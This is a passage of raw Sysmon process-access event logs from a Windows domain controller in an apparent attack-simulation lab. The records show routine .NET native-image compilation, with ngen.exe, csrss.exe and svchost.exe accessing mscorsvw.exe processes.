C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.355","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-00102EF70D00}","TargetProcessId":"4528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6920,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.371\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-00102EF70D00}\r\nTargetProcessId: 4528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.371","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-00102EF70D00}","TargetProcessId":"4528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6921,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.386\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001027FA0D00}\r\nTargetProcessId: 172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.386","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001027FA0D00}","TargetProcessId":"172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6922,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.386\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001027FA0D00}\r\nTargetProcessId: 172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.386","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001027FA0D00}","TargetProcessId":"172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6923,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.402\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001027FA0D00}\r\nTargetProcessId: 172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.402","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001027FA0D00}","TargetProcessId":"172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6924,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.418\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001082FD0D00}\r\nTargetProcessId: 5052\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.418","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001082FD0D00}","TargetProcessId":"5052","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6925,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.418\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001082FD0D00}\r\nTargetProcessId: 5052\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.418","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001082FD0D00}","TargetProcessId":"5052","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6926,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.433\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001082FD0D00}\r\nTargetProcessId: 5052\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.433","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001082FD0D00}","TargetProcessId":"5052","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6927,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.464\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-0010E4000E00}\r\nTargetProcessId: 4608\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 